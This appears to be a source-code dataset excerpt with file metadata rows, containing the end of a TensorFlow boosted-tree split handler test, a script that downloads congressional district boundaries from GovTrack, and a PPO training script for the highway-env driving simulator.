# Make sure the gain is subtracted by the tree complexity regularization.
self.assertAllClose(-0.5, gains[0], 0.00001)
self.assertEqual(0, split_node.feature_column)
# Check the split on partition 1.
# (-4 + 0.1) / (2 + 1)
expected_left_weight = -1.3
expected_right_weight = 0
# Verify candidate for partition 1, there's only one active bucket here
# so -0.5 gain is expected (because of tree complexity.
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(-0.5, gains[1], 0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.52, split_node.threshold, 0.00001)
class SparseSplitHandlerTest(test_util.TensorFlowTestCase):
def testGenerateFeatureSplitCandidates(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Sparse Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | N/A |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
example_partitions = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0], [2, 0], [3, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.52, 0.3, 0.52])
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the split on partition 0.
# -(0.2 + 1.2) / (0.12 + 0.2 + 2)
expected_left_weight = -0.603448275862069
# (0.2 + 1.2) ** 2 / (0.12 + 0.2 + 2)
expected_left_gain = 0.8448275862068965
# 0.5 / (0.07 + 2)
expected_right_weight = 0.24154589371980678
# 0.5 ** 2 / (0.07 + 2)
expected_right_gain = 0.12077294685990339
# (0.2 + 1.2 - 0.5) ** 2 / (0.12 + 0.2 + 0.07 + 2)
expected_bias_gain = 0.3389121338912133
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_right
self.assertAllClose(
expected_left_gain + expected_right_gain - expected_bias_gain, gains[0])
self.assertAllClose([expected_left_weight], left_child.value)
self.assertAllClose([expected_right_weight], right_child.value)
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
# Check the split on partition 1.
expected_left_weight = -1.8779342723004695
expected_right_weight = 0
# Verify candidate for partition 1, there's only one active bucket here
# so zero gain is expected.
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_left
self.assertAllClose(0.0, gains[1])
self.assertAllClose([expected_left_weight], left_child.value)
self.assertAllClose([expected_right_weight], right_child.value)
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
def testGenerateFeatureSplitCandidatesLossUsesSumReduction(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Sparse Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | N/A |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
example_partitions = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0], [2, 0], [3, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.52, 0.3, 0.52])
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=4.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS,
loss_uses_sum_reduction=True)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
update_3 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2, update_3]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the split on partition 0.
# -(0.4 + 2.4) / (0.24 + 0.4 + 4)
expected_left_weight = -0.603448275862069
# (0.4 + 2.4) ** 2 / (0.24 + 0.4 + 4)
expected_left_gain = 1.689655172413793
# 1 / (0.14 + 4)
expected_right_weight = 0.24154589371980678
# 1 ** 2 / (0.14 + 4)
expected_right_gain = 0.24154589371980678
# (0.4 + 2.4 - 1) ** 2 / (0.24 + 0.4 + 0.14 + 4)
expected_bias_gain = 0.6778242677824265
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_right
self.assertAllClose(
expected_left_gain + expected_right_gain - expected_bias_gain, gains[0])
self.assertAllClose([expected_left_weight], left_child.value)
self.assertAllClose([expected_right_weight], right_child.value)
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
# Check the split on partition 1.
expected_left_weight = -1.8779342723004695
expected_right_weight = 0
# Verify candidate for partition 1, there's only one active bucket here
# so zero gain is expected.
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_left
self.assertAllClose(0.0, gains[1])
self.assertAllClose([expected_left_weight], left_child.value)
self.assertAllClose([expected_right_weight], right_child.value)
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
def testGenerateFeatureSplitCandidatesMulticlassFullHessian(self):
with self.cached_session() as sess:
# Batch is 4, 2 classes
gradients = array_ops.constant([[0.2, 1.4], [-0.5, 0.1], [1.2, 3],
[4.0, -3]])
# 2x2 matrix for each instance
hessian_0 = [[0.12, 0.02], [0.3, 0.11]]
hessian_1 = [[0.07, -0.2], [-0.5, 0.2]]
hessian_2 = [[0.2, -0.23], [-0.8, 0.9]]
hessian_3 = [[0.13, -0.3], [-1.5, 2.2]]
hessians = array_ops.constant(
[hessian_0, hessian_1, hessian_2, hessian_3])
example_partitions = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0], [2, 0], [3, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.52, 0.3, 0.52])
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.TensorShape([2])
hessian_shape = tensor_shape.TensorShape([2, 2])
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.FULL_HESSIAN)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_right
# Each leaf has 2 element vector.
self.assertEqual(2, len(left_child.value))
self.assertEqual(2, len(right_child.value))
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_left
self.assertEqual(2, len(left_child.value))
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
def testGenerateFeatureSplitCandidatesMulticlassDiagonalHessian(self):
with self.cached_session() as sess:
# Batch is 4, 2 classes
gradients = array_ops.constant([[0.2, 1.4], [-0.5, 0.1], [1.2, 3],
[4.0, -3]])
# Each hessian is a diagonal from a full hessian matrix.
hessian_0 = [0.12, 0.11]
hessian_1 = [0.07, 0.2]
hessian_2 = [0.2, 0.9]
hessian_3 = [0.13, 2.2]
hessians = array_ops.constant(
[hessian_0, hessian_1, hessian_2, hessian_3])
example_partitions = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0], [2, 0], [3, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.52, 0.3, 0.52])
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.TensorShape([2])
hessian_shape = tensor_shape.TensorShape([2])
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.DIAGONAL_HESSIAN)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_right
# Each leaf has 2 element vector.
self.assertEqual(2, len(left_child.value))
self.assertEqual(2, len(right_child.value))
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_left
self.assertEqual(2, len(left_child.value))
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
def testGenerateFeatureSplitCandidatesInactive(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Sparse Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | N/A |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
example_partitions = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0], [2, 0], [3, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.52, 0.3, 0.52])
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
sparse_float_column=sparse_column,
init_stamp_token=0,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, False]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([False, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
# The handler was inactive so it shouldn't any splits.
self.assertEqual(len(partitions), 0)
self.assertEqual(len(gains), 0)
self.assertEqual(len(splits), 0)
def testEmpty(self):
with self.cached_session() as sess:
indices = constant_op.constant_v1([], dtype=dtypes.int64, shape=[0, 2])
# No values in this feature column in this mini-batch.
values = constant_op.constant_v1([], dtype=dtypes.float32)
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertEqual(len(partitions), 0)
self.assertEqual(len(gains), 0)
self.assertEqual(len(splits), 0)
def testEmptyBuckets(self):
"""Test that reproduces the case when quantile buckets were empty."""
with self.cached_session() as sess:
sparse_column = array_ops.sparse_placeholder(dtypes.float32)
# We have two batches - at first, a sparse feature is empty.
empty_indices = constant_op.constant_v1([], dtype=dtypes.int64,
shape=[0, 2])
empty_values = constant_op.constant_v1([], dtype=dtypes.float32)
empty_sparse_column = sparse_tensor.SparseTensor(empty_indices,
empty_values, [4, 2])
empty_sparse_column = empty_sparse_column.eval(session=sess)
# For the second batch, the sparse feature is not empty.
non_empty_indices = array_ops.constant(
[[0, 0], [2, 1], [3, 2]], dtype=dtypes.int64, shape=[3, 2])
non_empty_values = array_ops.constant(
[0.52, 0.3, 0.52], dtype=dtypes.float32)
non_empty_sparse_column = sparse_tensor.SparseTensor(
non_empty_indices, non_empty_values, [4, 2])
non_empty_sparse_column = non_empty_sparse_column.eval(session=sess)
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
# First, calculate quantiles and try to update on an empty data for a
# feature.
are_splits_ready = (
sess.run(
are_splits_ready,
feed_dict={sparse_column: empty_sparse_column}))
self.assertFalse(are_splits_ready)
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
# Now the feature in the second batch is not empty, but buckets
# calculated on the first batch are empty.
are_splits_ready2, partitions, gains, splits = (
sess.run(
[are_splits_ready2, partitions, gains, splits],
feed_dict={sparse_column: non_empty_sparse_column}))
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
# Since the buckets were empty, we can't calculate the splits.
self.assertEqual(len(partitions), 0)
self.assertEqual(len(gains), 0)
self.assertEqual(len(splits), 0)
def testDegenerativeCase(self):
with self.cached_session() as sess:
# One data example only, one leaf and thus one quantile bucket.The same
# situation is when all examples have the same values. This case was
# causing before a failure.
gradients = array_ops.constant([0.2])
hessians = array_ops.constant([0.12])
example_partitions = array_ops.constant([1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.58])
sparse_column = sparse_tensor.SparseTensor(indices, values, [1, 1])
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([1, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([1], partitions)
self.assertAllEqual([0.0], gains)
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
split_node = split_info.split_node.sparse_float_binary_split_default_left
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.58, split_node.split.threshold)
if __name__ == "__main__":
googletest.main()
| 39.792584 | 84 | 0.648088 |
4a1b546537429976973144cd5dd9fd191f2278b5
| 671 |
py
|
Python
|
src/fetchDistricts.py
|
syedhassaanahmed/legis-graph
|
8656102c53902added7def7cfe046182df086684
|
[
"MIT"
] | 50 |
2015-09-21T15:49:26.000Z
|
2021-12-23T17:54:07.000Z
|
src/fetchDistricts.py
|
syedhassaanahmed/legis-graph
|
8656102c53902added7def7cfe046182df086684
|
[
"MIT"
] | 15 |
2015-09-21T02:07:18.000Z
|
2019-04-15T01:30:53.000Z
|
src/fetchDistricts.py
|
syedhassaanahmed/legis-graph
|
8656102c53902added7def7cfe046182df086684
|
[
"MIT"
] | 22 |
2015-10-01T06:53:01.000Z
|
2020-12-11T01:41:46.000Z
|
'''
Fetch simplified WKT boundaries for 2014 congressional districts and
save in CSV format:
state,district,polygon
'''
import requests
import csv
BASE_URL = "https://gis.govtrack.us"
CD_2014_URL = "/boundaries/cd-2014/?limit=500"
# get meta boundary
r = requests.get(BASE_URL + CD_2014_URL)
j = r.json()
boundaries = j['objects']
with open('cb_2014_districts.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(['state', 'district', 'polygon'])
for b in boundaries:
p = str.split(b['name'], '-')
r = requests.get(BASE_URL + b['url'] + 'simple_shape?format=wkt')
wkt = r.text
writer.writerow([p[0], p[1], wkt])
| 22.366667 | 73 | 0.648286 |
4a1b556a1881de67b1c5f93b93fda4e81aa63bc1
| 3,530 |
py
|
Python
|
src/policy_gradient/PPO/ppo_highway.py
|
hougiebear/Deepdrive-Autonomous-Vehicles
|
6b952c9e5d01893dc4319bbd74b9fa951719fcf9
|
[
"MIT"
] | 1 |
2021-12-27T02:22:27.000Z
|
2021-12-27T02:22:27.000Z
|
src/policy_gradient/PPO/ppo_highway.py
|
hougiebear/Deepdrive-Autonomous-Vehicles
|
6b952c9e5d01893dc4319bbd74b9fa951719fcf9
|
[
"MIT"
] | null | null | null |
src/policy_gradient/PPO/ppo_highway.py
|
hougiebear/Deepdrive-Autonomous-Vehicles
|
6b952c9e5d01893dc4319bbd74b9fa951719fcf9
|
[
"MIT"
] | null | null | null |
import gym
import highway_env
import numpy as np
import argparse
from stable_baselines3 import PPO
from stable_baselines3.common.noise import NormalActionNoise
from stable_baselines3.common.results_plotter import load_results, ts2xy
import matplotlib.pyplot as plt
from stable_baselines3.common import results_plotter
from stable_baselines3.common.env_util import make_vec_env
params = {
"environment": "highway-v0",
"model_name": "PPO",
"train_steps": 200000,
"batch_size": 32,
"clip_range": 0.1,
"ent_coef": 0.00007,
"gae_lambda": 9,
"gamma": 0.95,
"learning_rate": 0.00087,
"max_grad_norm": 0.9,
"n_epochs": 20,
"n_steps": 128,
"sde_sample_freq": 64,
"vf_coef": 0.557588101099478,
"policy": "MlpPolicy"
}
policy_kwargs = dict(net_arch=[128, 128])
env = gym.make(params.get("environment"))
multi_env = make_vec_env(params.get("environment"), n_envs=4)
exp_name = params.get("model_name") + "_train_" + params.get("environment")
log_dir = '../../../logs/' + exp_name
def train(params):
model = PPO(params.get("policy"), env,
verbose=1,
tensorboard_log=log_dir,
batch_size=params.get("batch_size"),
clip_range=params.get("clip_range"),
ent_coef= params.get("ent_coef"),
gae_lambda=params.get("gae_lambda"),
gamma=params.get("gamma"),
learning_rate=params.get("learning_rate"),
max_grad_norm=params.get("max_grad_norm"),
n_epochs=params.get("n_epochs"),
n_steps=params.get("n_steps"),
sde_sample_freq=params.get("sde_sample_freq"),
vf_coef=params.get("vf_coef")
,policy_kwargs=dict(net_arch=[128, 128])
)
# Train for 1e5 steps
model.learn(total_timesteps=params.get("train_steps"))
# Save the trained agent
model.save(exp_name)
def evaluate(params):
# Load saved model
model = PPO.load(exp_name, env=env)
results = np.zeros(shape=(0,0))
obs = env.reset()
# Evaluate the agent
episode_reward = 0
for _ in range(params.get("test_episodes")):
action, _ = model.predict(obs, deterministic=True)
obs, reward, done, info = env.step(action)
episode_reward += reward
if done or info.get('is_success', False):
episode_reward = 0.0
obs = env.reset()
result = ("Reward:", episode_reward, "Success?", info.get('is_success', True))
results = np.append(results, result, axis=None)
def moving_average(values, window):
"""
Smooth values by doing a moving average
:param values: (numpy array)
:param window: (int)
:return: (numpy array)
"""
weights = np.repeat(1.0, window) / window
return np.convolve(values, weights, 'valid')
def plot_results(log_dir, title='Learning Curve'):
"""
plot the results
:param log_folder: (str) the save location of the results to plot
:param title: (str) the title of the task to plot
"""
x, y = ts2xy(load_results(log_dir), 'timesteps')
y = moving_average(y, window=50)
# Truncate x
x = x[len(x) - len(y):]
fig = plt.figure(title)
plt.plot(x, y)
plt.xlabel('Number of Timesteps')
plt.ylabel('Rewards')
plt.title(title + " Smoothed")
plt.show()
def sb3_plot():
results_plotter.plot_results([log_dir], 1e5, results_plotter.X_TIMESTEPS, exp_name)
train(params)
#evaluate(params)
| 28.699187 | 87 | 0.632578 |
4a1b567a6b0135d4fd100753f6f2fa1f745ad6fb
| 239,906 |
py
|
Python
|
src/sage/geometry/cone.py
|
abcijkxyz/sage
|
6ec717a56dcb0fd629ca850d9b9391ea8d96ccac
|
[
"BSL-1.0"
] | null | null | null |
src/sage/geometry/cone.py
|
abcijkxyz/sage
|
6ec717a56dcb0fd629ca850d9b9391ea8d96ccac
|
[
"BSL-1.0"
] | null | null | null |
src/sage/geometry/cone.py
|
abcijkxyz/sage
|
6ec717a56dcb0fd629ca850d9b9391ea8d96ccac
|
[
"BSL-1.0"
